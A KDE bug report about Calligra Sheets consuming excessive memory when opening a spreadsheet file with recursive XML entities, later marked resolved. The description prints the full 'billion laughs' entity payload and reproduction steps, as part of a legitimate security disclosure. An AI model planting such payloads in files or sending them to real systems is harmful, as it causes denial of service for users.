331869 – SECURITY: XML Bombs can cause Calligra Sheets to consume excessive machine resources

Bug 331869 - SECURITY: XML Bombs can cause Calligra Sheets to consume excessive machine resources

Summary: SECURITY: XML Bombs can cause Calligra Sheets to consume excessive machine re...

Status:	RESOLVED WORKSFORME

Alias:	None

Product:	calligrasheets
Classification:	Applications
Component:	general (other bugs)
Version First Reported In:	2.7.4
Platform:	Fedora RPMs Linux

Importance:	NOR crash
Target Milestone:	---
Assignee:	Calligra Sheets (KSpread) Bugs

URL:	http://search.cpan.org/src/DDICK/Spre...
Keywords:

Depends on:
Blocks:

Reported:	2014-03-08 06:01 UTC by David Dick
Modified:	2020-12-14 02:00 UTC (History)
CC List:	2 users (show)

See Also:	https://bugzilla.redhat.com/show_bug.cgi?id=1046440
Latest Commit:
Version Fixed In:
Sentry Crash Report:

Attachments
Add an attachment

Note You need to log in before you can comment on or make changes to this bug.

Description David Dick 2014-03-08 06:01:02 UTC

The referenced maindoc.ksp contains the following entries;

* documentinfo.xml
* maindoc.xml
* mimetype
* preview.png

The maindoc.xml file contains the following entity definitions.  

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<spreadsheet xmlns="http://www.calligra.org/DTD/tables" syntaxVersion="1" mime="application/x-kspread" editor="Calligra Sheets">

with the entity &lol9; is then included in the body of the spreadsheet.

This is standard recursive entity attack as per http://cwe.mitre.org/data/definitions/776.html

I filed a similar bug in Redhat's bugzilla as https://bugzilla.redhat.com/show_bug.cgi?id=1046440

Reproducible: Always

Steps to Reproduce:
1. Point browser at http://search.cpan.org/src/DDICK/Spreadsheet-CSV-0.07/t/data/bombs/maindoc.ksp
2. Click OK to open file in Calligra Sheets
3. Watch as Calligra Sheets consumes machine resources processing the external entities inserted in it
Actual Results:  
Calligra Sheets consumes excessive machine resources

Expected Results:  
Calligra Sheets should at a minimum refuse to open a file that it detects has defined entities.

Comment 1 Rex Dieter 2014-03-08 17:44:53 UTC

I can reproduce given the sample docs

Comment 2 Justin Zobel 2020-12-14 01:27:17 UTC

Thank you for the crash report, David.

As it has been a while since this was reported, can you please test and confirm if this issue is still occurring or if this bug report can be marked as resolved.

I have set the bug status to "needsinfo" pending your response, please change back to "reported" or "resolved/worksforme" when you respond, thank you.

Comment 3 David Dick 2020-12-14 02:00:13 UTC

My Fedora supplied Calligra Sheets no longer consumes large amounts of memory when it opens the supplied URL.